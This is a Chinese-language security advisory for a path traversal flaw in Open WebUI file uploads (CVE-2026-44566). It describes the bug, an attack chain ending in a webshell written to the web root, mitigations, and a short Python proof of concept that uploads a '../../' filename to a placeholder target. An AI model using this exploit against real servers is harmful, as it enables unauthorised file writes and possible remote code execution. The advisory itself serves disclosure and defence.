CVE-2026-44566 CVSS 7.3 高危

CVE-2026-44566 Open WebUI路径遍历漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44566

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.1.124版本之前，当用户在提示词中附加文件时，系统直接使用原始HTTP请求中的文件名，且未进行验证或清理。这允许攻击者上传包含路径遍历字符的文件，从而绕过上传目录限制，将文件写入服务器用户有权限访问的文件系统任意位置，可能导致远程代码执行。

技术细节

该漏洞源于Open WebUI在处理文件上传时未对`filename`参数进行严格的路径规范化处理。攻击者可在HTTP multipart/form-data请求中构造包含“../”序列的文件名（如`../../var/www/html/shell.php`）。服务器接收文件后，直接将其保存到解析后的路径，从而跳出预期的上传目录。由于无需认证即可利用，攻击者可将恶意文件写入Web根目录。若服务器配置不当解析该脚本，即可实现远程代码执行，完全控制服务器。

攻击链分析

STEP 1

1. 发现目标

攻击者识别出运行Open WebUI且版本低于0.1.124的目标服务器。

STEP 2

2. 构造载荷

攻击者准备特制的HTTP文件上传请求，在文件名字段中插入“../”路径遍历序列，指向敏感目录（如Web根目录）。

STEP 3

3. 发送请求

攻击者向服务器发送包含恶意文件名的POST请求，无需经过身份认证。

STEP 4

4. 写入文件

服务器处理请求，将文件保存到指定路径，攻击者成功写入Webshell或恶意文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Malicious filename using path traversal
    filename = "../../tmp/poc.txt"
    file_content = b"CVE-2026-44566 Proof of Concept"
    
    # Construct multipart upload
    files = {'file': (filename, file_content, 'text/plain')}
    
    try:
        response = requests.post(target_url, files=files)
        if response.status_code == 200:
            print(f"[+] Success: File written to {filename}")
        else:
            print(f"[-] Failed: HTTP {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    exploit("http://target-host/api/upload")

影响范围

Open WebUI < 0.1.124

防御指南

临时缓解措施

若无法立即升级，建议在反向代理或WAF层添加规则，拦截包含路径遍历字符（如../）的文件上传请求，并严格限制运行Web服务的系统账号对敏感目录的写入权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表